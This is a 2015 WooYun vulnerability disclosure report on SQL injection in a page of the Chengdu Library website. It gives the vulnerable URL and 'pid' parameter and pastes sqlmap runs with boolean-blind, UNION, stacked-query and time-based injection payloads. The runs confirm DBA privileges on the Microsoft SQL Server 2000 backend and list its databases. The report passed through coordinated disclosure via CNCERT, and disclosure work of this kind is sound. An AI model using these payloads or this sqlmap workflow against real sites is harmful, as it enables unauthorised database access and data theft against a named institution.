当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101442

漏洞标题:成都图书馆某SQL注入

相关厂商:成都图书馆

漏洞作者: 暗羽

提交时间:2015-03-17 12:04

修复时间:2015-05-04 17:14

公开时间:2015-05-04 17:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-17: 细节已通知厂商并且等待厂商处理中
2015-03-20: 厂商已经确认,细节仅向厂商公开
2015-03-30: 细节向核心白帽子及相关领域专家公开
2015-04-09: 细节向普通白帽子公开
2015-04-19: 细节向实习白帽子公开
2015-05-04: 细节向公众公开

简要描述:

SQL注入,DBA权限,可出数据

详细说明:

注入点:http://www.cdclib.org/sciedu/callanscience.aspx?pid=02

GET parameter 'pid' is vulnerable. Do you want to keep testi
ng the others (if any)? [y/N]
sqlmap identified the following injection points with a tota
l of 40 HTTP(s) requests:
---
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=02' AND 7368=7368 AND 'rLIo'='rLIo
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: pid=02' UNION ALL SELECT NULL,NULL,NULL,CHAR(11
3)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(72)+CHAR(78)
+CHAR(69)+CHAR(71)+CHAR(78)+CHAR(113)+CHAR(85)+CHAR(83)+CHAR
(108)+CHAR(85)+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(
113)--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pid=02'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pid=02' WAITFOR DELAY '0:0:5'--
---
[02:26:00] [INFO] testing Microsoft SQL Server
[02:26:00] [INFO] confirming Microsoft SQL Server
[02:26:01] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.
NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[02:26:01] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 15 times
[02:26:01] [INFO] fetched data logged to text files under 'C
:\Users\DarkWing\.sqlmap\output\www.cdclib.org'
[*] shutting down at 02:26:01


DBA权限

C:\Users\DarkWing>sqlmap.py -u "http://www.cdclib.org/sciedu
/callanscience.aspx?pid=02" --is-dba
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20141222}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets
without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and fed
eral laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 02:26:31
[02:26:31] [INFO] resuming back-end DBMS 'microsoft sql serv
er'
[02:26:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a tota
l of 0 HTTP(s) requests:
---
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=02' AND 7368=7368 AND 'rLIo'='rLIo
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: pid=02' UNION ALL SELECT NULL,NULL,NULL,CHAR(11
3)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(72)+CHAR(78)
+CHAR(69)+CHAR(71)+CHAR(78)+CHAR(113)+CHAR(85)+CHAR(83)+CHAR
(108)+CHAR(85)+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(
113)--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pid=02'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pid=02' WAITFOR DELAY '0:0:5'--
---
[02:26:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.
NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[02:26:32] [INFO] testing if current user is DBA
[02:26:32] [WARNING] reflective value(s) found and filtering
 out
current user is DBA:    True
[02:26:32] [INFO] fetched data logged to text files under 'C
:\Users\DarkWing\.sqlmap\output\www.cdclib.org'
[*] shutting down at 02:26:32


可出数据

[*] starting at 02:27:27
[02:27:27] [INFO] resuming back-end DBMS 'microsoft sql serv
er'
[02:27:27] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a tota
l of 0 HTTP(s) requests:
---
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=02' AND 7368=7368 AND 'rLIo'='rLIo
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: pid=02' UNION ALL SELECT NULL,NULL,NULL,CHAR(11
3)+CHAR(112)+CHAR(107)+CHAR(122)+CHAR(113)+CHAR(72)+CHAR(78)
+CHAR(69)+CHAR(71)+CHAR(78)+CHAR(113)+CHAR(85)+CHAR(83)+CHAR
(108)+CHAR(85)+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(
113)--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pid=02'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pid=02' WAITFOR DELAY '0:0:5'--
---
[02:27:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.
NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[02:27:31] [INFO] fetching database names
[02:27:31] [WARNING] reflective value(s) found and filtering
 out
available databases [13]:
[*] cdlibBBS
[*] ich2007
[*] Immaterial
[*] LIBWMS
[*] localDoc
[*] master
[*] model
[*] msdb
[*] ndcnc
[*] Northwind
[*] pubs
[*] shscore
[*] tempdb
[02:27:31] [INFO] fetched data logged to text files under 'C
:\Users\DarkWing\.sqlmap\output\www.cdclib.org'
[*] shutting down at 02:27:31

漏洞证明:

available databases [13]:
[*] cdlibBBS
[*] ich2007
[*] Immaterial
[*] LIBWMS
[*] localDoc
[*] master
[*] model
[*] msdb
[*] ndcnc
[*] Northwind
[*] pubs
[*] shscore
[*] tempdb

修复方案:

过滤

版权声明:转载请注明来源 暗羽@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-20 17:12

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论